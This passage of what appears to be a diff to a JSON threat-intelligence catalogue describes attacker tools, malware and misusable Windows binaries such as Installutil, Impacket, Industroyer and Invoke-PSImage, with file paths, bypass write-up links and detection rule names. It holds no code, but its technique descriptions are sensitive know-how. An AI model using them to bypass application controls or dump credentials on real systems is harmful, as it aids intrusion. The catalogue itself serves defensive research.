"49269d59-3a99-4362-83ea-41207ee591b4", + "value": "Ilasm.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** used for compile c# code into dll or exe.\n\n**Author:** Hai vaknin (lux)\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ilasm.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ilasm.exe\n\n**Resources:**\n* [https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt](https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt)\n\n**Detection:**\n* IOC: Ilasm may not be used often in production environments (such as on endpoints)\n* Sigma: [proc_creation_win_lolbin_ilasm.yml](https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml)[[Ilasm.exe - LOLBAS Project](/references/347a1f01-02ce-488e-9100-862971c1833f)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5119", + "source": "Tidal Cyber", + "tags": [ + "8bcce456-e1dc-4dd0-99a9-8334fd6f2847", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "49269d59-3a99-4362-83ea-41207ee591b4", + "type": "similar" + } + ], + "uuid": "492104c0-79d6-461e-9dc5-0e4bfd3f2387", + "value": "Ilasm" + }, + { + "description": "[[IMEWDBLD.exe - LOLBAS Project](/references/9d1d6bc1-61cf-4465-b3cb-b6af36769027)]", + "meta": { + "id": "3cf117d3-8636-4cdd-bc1a-a9623d950a76", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "2ef7c673-a0dc-4773-a9fd-337ed68d9b0b", + "type": "similar" + } + ], + "uuid": "12fa3dba-d84c-490d-bb72-88b54edf663c", + "value": "IMEWDBLD.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft IME Open Extended Dictionary Module\n\n**Author:** Wade Hickey\n\n**Paths:**\n* C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe\n\n**Resources:**\n* [https://twitter.com/notwhickey/status/1367493406835040265](https://twitter.com/notwhickey/status/1367493406835040265)\n\n**Detection:**\n* Sigma: [net_connection_win_imewdbld.yml](https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml)[[IMEWDBLD.exe - LOLBAS Project](/references/9d1d6bc1-61cf-4465-b3cb-b6af36769027)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5115", + "source": "Tidal Cyber", + "tags": [ + "796962fe-56d7-4816-9193-153da0be7c10", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "12fa3dba-d84c-490d-bb72-88b54edf663c", + "type": "similar" + } + ], + "uuid": "2ef7c673-a0dc-4773-a9fd-337ed68d9b0b", + "value": "IMEWDBLD" + }, + { + "description": "[Imminent Monitor](https://app.tidalcyber.com/software/925fc0db-9315-4703-9353-1d0e9ecb1439) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.[[Imminent Unit42 Dec2019](https://app.tidalcyber.com/references/28f858c6-4c00-4c0c-bb27-9e000ba22690)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0434", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "153c14a6-31b7-44f2-892e-6d9fdc152267", + "type": "used-by" + }, + { + "dest-uuid": "1bfbb1e1-022c-57e9-b70e-711c601640be", + "type": "used-by" + }, + { + "dest-uuid": "8f8cd191-902c-4e83-bf20-b57c8c4640e9", + "type": "similar" + } + ], + "uuid": "925fc0db-9315-4703-9353-1d0e9ecb1439", + "value": "Imminent Monitor" + }, + { + "description": "[Impacket](https://app.tidalcyber.com/software/cf2c5666-e8ad-49c1-ac8f-30ed65f9e52c) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://app.tidalcyber.com/software/cf2c5666-e8ad-49c1-ac8f-30ed65f9e52c) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.[[Impacket Tools](https://app.tidalcyber.com/references/cdaf72ce-e8f7-42ae-b815-14a7fd47e292)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0357", + "source": "MITRE", + "tags": [ + "6070668f-1cbd-4878-8066-c636d1d8659c", + "d8f7e071-fbfd-46f8-b431-e241bb1513ac", + "61cdbb28-cbfd-498b-9ab1-1f14337f9524", + "e551ae97-d1b4-484e-9267-89f33829ec2c", + "6a80006a-ff1c-48e8-bb6f-d109d7b7a2fc", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "4d767e87-4cf6-438a-927a-43d2d0beaab7", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "used-by" + }, + { + "dest-uuid": "1bcc9382-ccfe-4b04-91f3-ef1250df5e5b", + "type": "used-by" + }, + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "570198e3-b59c-5772-b1ee-15d7ea14d48a", + "type": "used-by" + }, + { + "dest-uuid": "26c87906-d750-42c5-946c-d4162c73fc7b", + "type": "similar" + } + ], + "uuid": "cf2c5666-e8ad-49c1-ac8f-30ed65f9e52c", + "value": "Impacket" + }, + { + "description": "[[Dragos Crashoverride 2017](https://app.tidalcyber.com/references/c8f624e3-2ba2-4564-bd1c-f06b9a6a8bce)]", + "meta": { + "id": "f0101fc7-be8d-4460-8444-779813c409d5" + }, + "related": [ + { + "dest-uuid": "09398a7c-aee5-44af-b99d-f73d3b39c299", + "type": "similar" + } + ], + "uuid": "4bf0e893-5e72-48aa-898a-7dfeffa7781a", + "value": "CRASHOVERRIDE" + }, + { + "description": "[[ESET Industroyer](https://app.tidalcyber.com/references/9197f712-3c53-4746-9722-30e248511611)]", + "meta": { + "id": "2e8fe68a-5bf5-4850-97e8-7be79236812a" + }, + "related": [ + { + "dest-uuid": "09398a7c-aee5-44af-b99d-f73d3b39c299", + "type": "similar" + } + ], + "uuid": "5e72df38-9dd3-4b0a-a0da-d98cd732e823", + "value": "Win32/Industroyer" + }, + { + "description": "[Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.[[ESET Industroyer](https://app.tidalcyber.com/references/9197f712-3c53-4746-9722-30e248511611)] [Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299) was used in the attacks on the Ukrainian power grid in December 2016.[[Dragos Crashoverride 2017](https://app.tidalcyber.com/references/c8f624e3-2ba2-4564-bd1c-f06b9a6a8bce)] This is the first publicly known malware specifically designed to target and impact operations in the electric grid.[[Dragos Crashoverride 2018](https://app.tidalcyber.com/references/d14442d5-2557-4a92-9a29-b15a20752f56)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0604", + "source": "MITRE", + "tags": [ + "37dff778-95a6-4e51-a26a-1d399ef713be" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "e401d4fe-f0c9-44f0-98e6-f93487678808", + "type": "similar" + }, + { + "dest-uuid": "4bf0e893-5e72-48aa-898a-7dfeffa7781a", + "type": "similar" + }, + { + "dest-uuid": "5e72df38-9dd3-4b0a-a0da-d98cd732e823", + "type": "similar" + } + ], + "uuid": "09398a7c-aee5-44af-b99d-f73d3b39c299", + "value": "Industroyer" + }, + { + "description": "[Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299). Security researchers assess that [Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.[[Industroyer2 Blackhat ESET](https://app.tidalcyber.com/references/d9e8ca96-8646-5dd9-bede-56305385b2e4)]", + "meta": { + "platforms": [], + "software_attack_id": "S1072", + "source": "MITRE", + "tags": [ + "37dff778-95a6-4e51-a26a-1d399ef713be" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "type": "similar" + } + ], + "uuid": "53c5fb76-a690-55c3-9e02-39577990da2a", + "value": "Industroyer2" + }, + { + "description": "[[Infdefaultinstall.exe - LOLBAS Project](/references/5e83d17c-dbdd-4a6c-a395-4f921b68ebec)]", + "meta": { + "id": "c83a5539-de50-46fd-b8e9-d7debdfc92ee", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "e35b5513-4370-4f8c-b3a6-1f64c65f1e85", + "type": "similar" + } + ], + "uuid": "54922044-3d2e-4885-b314-2c0e2628fd75", + "value": "Infdefaultinstall.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary used to perform installation based on content inside inf files\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Infdefaultinstall.exe\n* C:\\Windows\\SysWOW64\\Infdefaultinstall.exe\n\n**Resources:**\n* [https://twitter.com/KyleHanslovan/status/911997635455852544](https://twitter.com/KyleHanslovan/status/911997635455852544)\n* [https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/](https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/)\n* [https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/](https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/)\n\n**Detection:**\n* Sigma: [proc_creation_win_infdefaultinstall_execute_sct_scripts.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[Infdefaultinstall.exe - LOLBAS Project](/references/5e83d17c-dbdd-4a6c-a395-4f921b68ebec)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5120", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "54922044-3d2e-4885-b314-2c0e2628fd75", + "type": "similar" + } + ], + "uuid": "e35b5513-4370-4f8c-b3a6-1f64c65f1e85", + "value": "Infdefaultinstall" + }, + { + "description": "[InnaputRAT](https://app.tidalcyber.com/software/e42bf572-1e70-4467-a4b7-5e22c776c758) is a remote access tool that can exfiltrate files from a victim’s machine. [InnaputRAT](https://app.tidalcyber.com/software/e42bf572-1e70-4467-a4b7-5e22c776c758) has been seen out in the wild since 2016. [[ASERT InnaputRAT April 2018](https://app.tidalcyber.com/references/29c6575f-9e47-48cb-8162-15280002a6d5)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0259", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c8b6cc43-ce61-42ae-87f3-a5f10526f952", + "type": "similar" + } + ], + "uuid": "e42bf572-1e70-4467-a4b7-5e22c776c758", + "value": "InnaputRAT" + }, + { + "description": "[[LOLBAS Installutil](/references/7dfb2c45-862a-4c25-a65a-55abea4b0e44)]", + "meta": { + "id": "8584527d-8295-412a-a88b-69339f8878b7", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "c983bb77-b96c-44d5-b3f8-2540d7c604db", + "type": "similar" + } + ], + "uuid": "91100384-d619-4bf1-9f83-7ffc16d777f2", + "value": "Installutil.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\InstallUtil.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/](https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/)\n* [https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12](https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12)\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md)\n* [https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/](https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool](https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool)\n\n**Detection:**\n* Sigma: [proc_creation_win_instalutil_no_log_execution.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml)\n* Sigma: [proc_creation_win_lolbin_installutil_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml)\n* Elastic: [defense_evasion_installutil_beacon.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)[[LOLBAS Installutil](/references/7dfb2c45-862a-4c25-a65a-55abea4b0e44)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5121", + "source": "Tidal Cyber", + "tags": [ + "a3f84674-3813-4993-9e34-39cdaa19cbd1", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "91100384-d619-4bf1-9f83-7ffc16d777f2", + "type": "similar" + } + ], + "uuid": "c983bb77-b96c-44d5-b3f8-2540d7c604db", + "value": "Installutil" + }, + { + "description": "", + "meta": { + "id": "c9f20c45-80cc-45e2-b082-e3036ee66d8b", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9ec3777d-9a36-4822-a3e2-a7ce5d296309", + "type": "similar" + } + ], + "uuid": "0ea31764-5a77-4510-b873-ca1e8bdaf90e", + "value": "Interact.sh" + }, + { + "description": "According to joint Cybersecurity Advisory AA23-250A (September 2023), Interactsh is \"an open-source tool for detecting external interactions (communication)\". The Advisory further states that the tool is \"used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity\".[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5049", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "15787198-6c8b-4f79-bf50-258d55072fee" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "0ea31764-5a77-4510-b873-ca1e8bdaf90e", + "type": "similar" + } + ], + "uuid": "9ec3777d-9a36-4822-a3e2-a7ce5d296309", + "value": "Interactsh" + }, + { + "description": "[InvisiMole](https://app.tidalcyber.com/software/3ee4c49d-2f2c-4677-b193-69f16f2851a4) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://app.tidalcyber.com/software/3ee4c49d-2f2c-4677-b193-69f16f2851a4) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) infrastructure has been used to download and execute [InvisiMole](https://app.tidalcyber.com/software/3ee4c49d-2f2c-4677-b193-69f16f2851a4) against a small number of victims.[[ESET InvisiMole June 2018](https://app.tidalcyber.com/references/629fa1d8-06cb-405c-a2f7-c511b54cd727)][[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0260", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47afe41c-4c08-485e-b062-c3bd209a1cce", + "type": "similar" + } + ], + "uuid": "3ee4c49d-2f2c-4677-b193-69f16f2851a4", + "value": "InvisiMole" + }, + { + "description": "[Invoke-PSImage](https://app.tidalcyber.com/software/2200a647-3312-44c0-9691-4a26153febbb) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. [[GitHub Invoke-PSImage](https://app.tidalcyber.com/references/dd210b79-bd5f-4282-9542-4d1ae2f16438)]", + "meta": { + "platforms": [], + "software_attack_id": "S0231", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "16a65ee9-cd60-4f04-ba34-f2f45fcfc666", + "type": "used-by" + }, + { + "dest-uuid": "b52d6583-14a2-4ddc-8527-87fd2142558f", + "type": "similar" + } + ], + "uuid": "2200a647-3312-44c0-9691-4a26153febbb", + "value": "Invoke-PSImage" + }, + { + "description": "IOBit is a self-described \"freeware\" tool that can ostensibly be used to \"clean, optimize, speed up and secure\" personal computers. According to U.S. cybersecurity authorities, IOBit has been used by adversaries, such as ransomware actors, as part of their operations, for example to disable anti-virus software.[[U.S. CISA Play Ransomware December 2023](/references/ad96148c-8230-4923-86fd-4b1da211db1a)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5080", + "source": "Tidal Cyber", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "6eb50f82-86cc-4eff-b1d1-66e1c6fd74f3", + "type": "used-by" + } + ], + "uuid": "9c955014-2d83-4b5b-9127-cfc49e86779f", + "value": "IOBit" + }, + { + "description": "[ipconfig](https://app.tidalcyber.com/software/4f519002-0576-4f8e-8add-73ebac9a86e6) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. [[TechNet Ipconfig](https://app.tidalcyber.com/references/8a6e6f59-70fb-48bf-96d2-318dd92df995)]", + "meta": { + "platforms": [], + "software_attack_id": "S0100", + "source": "MITRE", + "tags": [ + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "cd1b5d44-226e-4405-8985-800492cf2865", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "863b7013-133d-4a82-93d2-51b53a8fd30e", + "type": "used-by" + }, + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "26c0925f-1a3c-4df6-b27a-62b9731299b8", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "7c3ef21c-0e1c-43d5-afb0-3a07c5a66937", + "type": "used-by" + }, + { + "dest-uuid": "8567136b-f84a-45ed-8cce-46324c7da60e", + "type": "used-by" + }, + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "0610cd57-2511-467a-97e3-3c810384074f", + "type": "used-by" + }, + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", + "type": "similar" + } + ], + "uuid": "4f519002-0576-4f8e-8add-73ebac9a86e6", + "value": "ipconfig" + }, + { + "description": "[IronNetInjector](https://app.tidalcyber.com/software/9ca96281-8ff9-4619-a79d-16c5a9594eae) is a [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://app.tidalcyber.com/software/300c5997-a486-4a61-8213-93a180c22849).[[Unit 42 IronNetInjector February 2021 ](https://app.tidalcyber.com/references/f04c89f7-d951-4ebc-a5e4-2cc69476c43f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0581", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "b1595ddd-a783-482a-90e1-8afc8d48467e", + "type": "similar" + } + ], + "uuid": "9ca96281-8ff9-4619-a79d-16c5a9594eae", + "value": "IronNetInjector" + }, + { + "description": "[ISMInjector](https://app.tidalcyber.com/software/752ab0fc-7fa1-4e54-bd9a-7a280a38ed77) is a Trojan used to install another [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) backdoor, ISMAgent. [[OilRig New Delivery Oct 2017](https://app.tidalcyber.com/references/f5f3e1e7-1d83-4ddc-a878-134cd0d268ce)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0189", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "5be33fef-39c0-4532-84ee-bea31e1b5324", + "type": "similar" + } + ], + "uuid": "752ab0fc-7fa1-4e54-bd9a-7a280a38ed77", + "value": "ISMInjector" + }, + { + "description": "[Ixeshe](https://app.tidalcyber.com/software/6dbf31cf-0ba0-48b4-be82-38889450845c) is a malware family that has been used since at least 2009 against targets in East Asia. [[Moran 2013](https://app.tidalcyber.com/references/d38bdb47-1a8d-43f8-b7ed-dfa5e430ac2f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0015", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "225314a7-8f40-48d4-9cff-3ec39b177762", + "type": "used-by" + }, + { + "dest-uuid": "8beac7c2-48d2-4cd9-9b15-6c452f38ac06", + "type": "similar" + } + ], + "uuid": "6dbf31cf-0ba0-48b4-be82-38889450845c", + "value": "Ixeshe" + }, + { + "description": "Jaguar Tooth is a malicious software bundle consisting of a series of payloads and patches. Russia-backed APT28 used Jaguar Tooth during a series of compromises involving vulnerable Cisco routers belonging to U.S., Ukrainian, and other entities in 2021.[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]\n\nAccording to an April 2023 UK National Cyber Security Centre technical report on Jaguar Tooth, the malware is deployed and executed via exploitation of CVE-2017-6742, a Simple Network Management Protocol (SNMP) vulnerability for which Cisco released a patch in 2017. Jaguar Tooth deployments allowed actors to collect further device information via execution of Cisco IOS Command Line Interface commands, discover other network devices, and achieve unauthenticated backdoor access to victim systems.[[UK NCSC Jaguar Tooth April 18 2023](/references/954e0cb9-9a93-4cac-af84-c6989b973fac)]\n\n**Related Vulnerabilities**: CVE-2017-6742[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Network" + ], + "software_attack_id": "S5061", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "15787198-6c8b-4f79-bf50-258d55072fee", + "f01290d9-7160-44cb-949f-ee4947d04b6f", + "cd1b5d44-226e-4405-8985-800492cf2865" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + } + ], + "uuid": "0eb47e25-56ec-42ba-9850-e50450b853e0", + "value": "Jaguar Tooth" + }, + { + "description": "[Janicab](https://app.tidalcyber.com/software/a4debf1f-8a37-4c89-8ebc-31de71d33f79) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. 